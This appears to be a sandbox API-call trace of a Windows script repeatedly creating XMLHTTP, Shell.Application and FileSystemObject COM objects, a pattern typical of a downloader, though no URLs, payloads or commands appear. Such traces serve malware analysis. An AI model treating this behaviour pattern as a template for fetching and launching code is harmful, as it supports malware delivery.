	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0401.709] ??2@YAPEAX_K@Z () returned 0x62f330
	[0401.709] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0401.709] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0401.709] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.709] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0401.709] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0401.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0402.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0402.528] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0402.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0402.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0402.528] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0402.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0402.528] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0402.528] SysStringLen (param_1=0x0) returned 0x0
	[0402.528] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0402.528] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0402.529] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0402.529] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0402.529] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0402.529] ??2@YAPEAX_K@Z () returned 0x62f350
	[0402.529] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0402.529] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0402.529] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0402.529] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0402.529] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0402.529] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0402.529] SysStringLen (param_1=0x0) returned 0x0
	[0402.529] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0402.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0402.532] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0402.532] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0402.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0402.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0402.532] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0403.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0403.011] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0403.011] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0403.012] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.012] SysStringLen (param_1=0x0) returned 0x0
	[0403.012] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.013] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.013] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0403.013] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.013] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0403.013] ??2@YAPEAX_K@Z () returned 0x62f330
	[0403.013] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0403.013] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.013] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0403.013] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0403.013] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0403.013] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.013] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.016] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.016] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.016] SysStringLen (param_1=0x0) returned 0x0
	[0403.016] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.016] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.016] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0403.017] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0403.017] ??2@YAPEAX_K@Z () returned 0x62f310
	[0403.017] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0403.017] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.017] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0403.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0403.017] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0403.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.017] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.017] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.017] SysStringLen (param_1=0x0) returned 0x0
	[0403.017] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.018] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0403.018] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0403.018] ??2@YAPEAX_K@Z () returned 0x62f330
	[0403.018] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0403.018] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.018] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0403.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0403.018] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0403.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.018] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.018] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.018] SysStringLen (param_1=0x0) returned 0x0
	[0403.018] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.019] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0403.019] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
